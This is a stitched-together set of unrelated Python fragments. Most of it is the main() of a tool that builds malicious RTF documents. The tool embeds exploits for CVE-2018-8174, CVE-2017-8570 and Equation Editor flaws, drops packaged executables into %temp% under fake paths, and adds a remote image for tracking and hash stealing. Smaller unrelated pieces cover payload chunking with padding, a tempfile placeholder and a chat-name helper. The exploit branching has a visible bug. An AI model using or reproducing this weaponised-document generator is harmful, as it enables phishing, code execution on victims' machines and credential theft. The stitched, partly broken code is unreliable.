def write_to_tempfile(kls, data_uri):
'''
*placeholder method*
this method will create a new TempFile (or cStringIO) with the
contents of the data_uri which can then be POST'ed to kobocat in
a mock submission.
'''
(ftype, fext, fcont) = kls._attachment_split(data_uri)
fname = 'a%s.%s' % (randstr(10), fext)
return (fname, '/tmp/path/to/%s' % fname)
def _replace(self, match):
if match.group('integer') and match.group('integer_mult_start'):
start = int(match.group('integer_mult_start'))
end = start
if match.group('integer_mult_end'):
end = int(match.group('integer_mult_end'))
return utils.randstr(end, start, string.digits)
elif match.group('character') and match.group('character_mult_start'):
start = int(match.group('character_mult_start'))
end = start
if match.group('character_mult_end'):
end = int(match.group('character_mult_end'))
return utils.randstr(end, start, string.ascii_lowercase)
elif match.group('domain'):
return random.choice(['it', 'es', 'uk', 'en', 'com'])
elif match.group('payload'):
current_payload = (self.start_delimiter +
self.chunked_payload.next() +
self.end_delimiter)
start = int(match.group('payload_mult_start'))
# Eventually add padding if current_payload is smaller than minsize
if len(current_payload) < start:
padding_length = start - len(current_payload)
current_payload += utils.randstr(padding_length,
padding_length,
string.letters)
return current_payload
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-D', '--debug', action='store_true', help='enable debug')
parser.add_argument('-l', '--list', action='store_true', help='list exploits and additions')
parser.add_argument('-u', '--use', action='append', help='add exploit (see --list)')
parser.add_argument('--use-cve', action='append', help='add exploit (by CVE)')
parser.add_argument('--exe-name',
help='name for dropped EXE file (for exploits equation and composite)')
parser.add_argument('--template', default=utils.basedir(default_rtf),
help='RTF template to add exploit to (default: {})'.format(default_rtf))
parser.add_argument('--fake-path', default=default_fakepath,
help='fake path for packaged files (default: {})'.format(default_fakepath))
parser.add_argument('-o', '--out', help='RTF output')
king = parser.add_argument_group('king exploit', 'King exploit (CVE-2018-8174) options')
king.add_argument('--king-shellcode', default=utils.basedir(default_king_shellcode),
help='shellcode for CVE-2018-8174 (default: {})'.format(default_king_shellcode))
king.add_argument('--king-url', help='URL where HTML will be hosted for king exploit (max: 39 chars)')
king.add_argument('--king-html-out', help='output file for king HTML')
composite = parser.add_argument_group('composite exploit', 'Composite moniker exploit (CVE-2017-8570) options')
composite.add_argument('--composite-sct', help='use this SCT file instead of generating one')
additions = parser.add_argument_group('additions', 'Additional things to add to the RTF')
additions.add_argument('--image-track', help='include an image from this URL, for tracking and hash stealing')
additions.add_argument('-p', '--package', action='append',
help='files to add as packages. will by dropped in temp (append fake name with colon)')
args = parser.parse_args()
# -D/--debug
utils.enable_debug = args.debug
# -l/--list
if args.list:
print('exploits (use with --use):')
for exploit, cve in exploit_to_cve.items():
print(' - {} ({})'.format(exploit, cve))
print()
print('additions:')
print(' - image tracking and hash stealing (use with --image-track)')
print(' - embed file as package to be dropped in %temp% (use with --package)')
sys.exit()
# read original rtf
with open(args.template, 'r') as fp:
rtf = fp.read()
# remove last }
rtf = rtf.rstrip()
if rtf[-1] != '}':
bye('} must be the last character of the rtf')
rtf = rtf[:-1]
rtf += '\n' * 3
# use these exploits
used = []
if args.use:
# -u/--use
for item in args.use:
for exploit in item.split(','):
exploit = exploit.lower()
if exploit == 'all':
# use all exploits
used += supported_exploits
else:
# check to make sure it exists
if exploit not in supported_exploits:
bye('unknown exploit: {}'.format(exploit))
used.append(exploit)
else:
# defaults
used = default_exploits
# --use-cve
if args.use_cve:
for item in args.use_cve:
for cve in item.split(','):
cve = cve.lower()
# check to make sure it exists
if cve not in cve_to_exploit:
bye('unknown CVE: {}'.format(cve))
used.append(cve_to_exploit[cve])
# sort the exploits by reliability
used = list(set(used))
used = sorted(used, key=lambda x: supported_exploits.index(x))
# embed packages
packages = None
if args.package:
packages = parse_packages(args.package)
for package, fakename in packages:
package = rtf_package.Package(package, fakename=fakename,
fakepath=args.fake_path)
rtf += package.build_package()
# track with image (--image-track)
if args.image_track:
yes('adding image track: {}'.format(args.image_track))
rtf += generate_image(args.image_track)
# generate exploits
for exploit in used:
yes('adding exploit {} ({})'.format(exploit, exploit_to_cve[exploit]))
if exploit == 'king':
# check args
if not args.king_url:
bye('specify --king-url')
if not args.king_html_out:
bye('specify --king-html-out')
# if using the default shellcode, make sure it'll work
if args.king_shellcode == utils.basedir(default_king_shellcode):
if (args.exe_name and args.exe_name != default_king_exe_name) or \
not check_packages(packages, default_king_exe_name):
bye('the default king shellcode expects an executable named {} to be packaged'.format(default_king_exe_name))
# make rtf part
rtf_part = exploits.king.generate_rtf(args.king_url)
if not rtf_part:
bye('king url too long: {}'.format(args.king_url))
rtf += rtf_part
# read shellcode
with open(args.king_shellcode, 'rb') as fp:
shellcode = fp.read()
# make html part
html = exploits.king.generate_html(shellcode)
# output html
ok('writing king html to {}'.format(args.king_html_out))
ok('rtf will retrive king exploit from {}'.format(args.king_url))
with open(args.king_html_out, 'w+') as fp:
fp.write(html)
elif exploit in ['equation1', 'equation2']:
if not check_packages(packages, args.exe_name):
bye('provide a file to execute with -p/--package (or change file with --exe-name)'.format(args.exe_name))
# exe name is --exe-name or the package if there's only one
exe_name = args.exe_name if args.exe_name else packages[0][1]
if exploit == 'equation2':
rtf += exploits.equation.generate_rtf1(exe_name)
elif exploit == 'equation2':
rtf += exploits.equation.generate_rtf2(exe_name)
elif exploit == 'composite':
if not check_packages(packages, args.exe_name):
bye('provide a file to execute with -p/--package (or change file with --exe-name)'.format(args.exe_name))
# exe name is --exe-name or the package if there's only one
exe_name = args.exe_name if args.exe_name else packages[0][1]
# add SCT if needed
with tempfile.NamedTemporaryFile() as temp:
sct_name = utils.randstr(15, 15) + '.sct'
if args.composite_sct:
# use user SCT
package = rtf_package.Package(args.composite_sct,
fakename=sct_name,
fakepath=args.fake_path)
rtf += package.build_package()
else:
# build an SCT
sct = exploits.composite.generate_sct(exe_name)
temp.write(sct.encode())
temp.flush()
package = rtf_package.Package(temp.name,
fakename=sct_name,
fakepath=args.fake_path)
rtf += package.build_package()
rtf += exploits.composite.generate_rtf(sct_name)
else:
raise RuntimeError('unknown exploit')
# add back an enclosing }
rtf += '}\n'
# write new rtf
if args.out:
ok('writing rtf to {}'.format(args.out))
with open(args.out, 'w+') as fp:
fp.write(rtf)
else:
bye('specify output RTF file with --out')
def gen_chat_name(command):
if command == '.random':
return utils.randstr(10)
else:
return command[1:-1]
